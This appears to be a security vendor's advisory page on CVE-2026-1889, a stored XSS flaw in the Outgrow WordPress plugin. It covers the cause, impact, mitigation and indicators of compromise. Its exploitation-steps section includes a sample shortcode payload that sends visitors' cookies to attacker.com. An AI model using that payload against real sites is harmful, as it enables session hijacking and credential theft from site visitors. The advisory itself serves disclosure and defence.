CVE-2026-1889
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-1889 is a Stored Cross-Site Scripting (XSS) vulnerability in the Outgrow plugin for WordPress, affecting all versions up to and including 2.1. The flaw exists in the id attribute of the [outgrow] shortcode due to insufficient input sanitization and output escaping on user-supplied attributes. It was published on March 21, 2026, and carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. The vulnerable code is located in newOutgrow.php at line 87, where the id attribute passed to the [outgrow] shortcode is rendered without proper sanitization or escaping. An authenticated attacker with at least contributor-level access can embed a malicious JavaScript payload in the shortcode attribute within a post or page, which is then stored in the database and executed in the browsers of any user who visits the affected page (Wordfence, WordPress Plugin Trac).

Impact

Successful exploitation allows an attacker to inject persistent malicious scripts that execute in the context of any visitor's browser session on the affected WordPress site. This can lead to session hijacking, credential theft, defacement, redirection to malicious sites, or further attacks against site administrators. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect all users visiting the compromised page (Wordfence).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1889. The EPSS score is approximately 0.03%, indicating a low probability of near-term exploitation. The vulnerability requires authenticated access at the contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities. It does not appear in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Outgrow plugin version 2.1 or earlier using tools like WPScan or by inspecting plugin directories.
  2. Obtain contributor access: Register or compromise an account with at least contributor-level privileges on the target WordPress site.
  3. Craft malicious shortcode: Create or edit a post/page and insert a shortcode with a malicious payload in the id attribute, e.g., [outgrow id="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  4. Publish the page: Submit the post/page for publication (contributors may require editor approval, but editors/admins reviewing the draft may also trigger execution).
  5. Payload execution: When any authenticated or unauthenticated user visits the page containing the injected shortcode, the malicious script executes in their browser, enabling session theft, credential harvesting, or further attacks (Wordfence, WordPress Plugin Trac).

Indicators of compromise

  • Logs: WordPress database or audit logs showing insertion of [outgrow id="..."] shortcodes containing <script>, javascript:, or encoded variants (e.g., &#x3C;script&#x3E;) in post content.
  • Network: Outbound requests from visitor browsers to unexpected external domains shortly after loading pages containing the Outgrow shortcode; potential exfiltration of cookie or session data to attacker-controlled endpoints.
  • File System: Unexpected modifications to newOutgrow.php or other plugin files if the attacker escalated to file write access after initial XSS exploitation.
  • Application: Presence of posts or pages authored by contributor-level accounts containing the [outgrow] shortcode with anomalous or encoded id attribute values.

Mitigation and workarounds

Users should update the Outgrow WordPress plugin to version 2.2 or later, which addresses the insufficient sanitization of the id shortcode attribute. As an interim workaround, site administrators can restrict contributor-level users from publishing content without editorial review, or temporarily disable the Outgrow plugin until the update is applied. Reviewing existing posts and pages for suspicious [outgrow] shortcode usage is also recommended (Wordfence, WordPress Plugin).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-15239NONEN/A
  • simple-cloudflare-turnstile
NoYesAug 07, 2026
CVE-2026-15211NONEN/A
  • subscriptions-for-woocommerce
NoYesAug 07, 2026
CVE-2026-15148NONEN/A
  • wp-events-manager
NoYesAug 07, 2026
CVE-2026-16265NONEN/A
  • wp-google-map-plugin
NoYesAug 07, 2026
CVE-2026-16263NONEN/A
  • wp-google-map-plugin
NoYesAug 07, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management